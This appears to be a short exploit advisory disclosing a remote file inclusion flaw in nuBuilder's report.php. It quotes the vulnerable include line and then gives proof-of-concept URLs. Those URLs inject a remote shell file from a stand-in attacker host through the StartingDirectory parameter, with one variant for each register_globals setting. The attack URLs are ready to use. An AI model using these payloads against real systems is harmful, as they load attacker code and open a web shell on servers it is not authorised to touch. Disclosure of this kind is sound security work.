Software: nuBuilder 10.04.x and lower(maybe)?
Type: Remote File Inclusion
Download: http://sourceforge.net/projects/nubuilder/files/
Author: Ahlspiess
Email: ahlspiess@tbdsecurity.com
Vulnerable file: report.php
report.php file content
1<?php
2/*3** File: report.php
4** Author: nuSoftware
5** Created:2007/04/266** Last modified:2009/07/157**8** Copyright 2004,2005,2006,2007,2008,2009 nuSoftware
9**10** This fileis part of the nuBuilder source package andis licensed under the
11** GPLv3. For support on developing in nuBuilder, please visit the nuBuilder
12** wiki and forums. For details on contributing a patch for nuBuilder, please
13** visit the `Project Contributions' forum.14**15** Website: http://www.nubuilder.com
16** Wiki: http://wiki.nubuilder.com
17** Forums: http://forums.nubuilder.com
18*/1920 include($GLOBALS['StartingDirectory']."/database.php");<== interesting huh?
POC
Succesfully tested against php config register_global = On and Off, allow_url_include = On
register_global = Off
http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?
register_global = On
http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?
#EOF
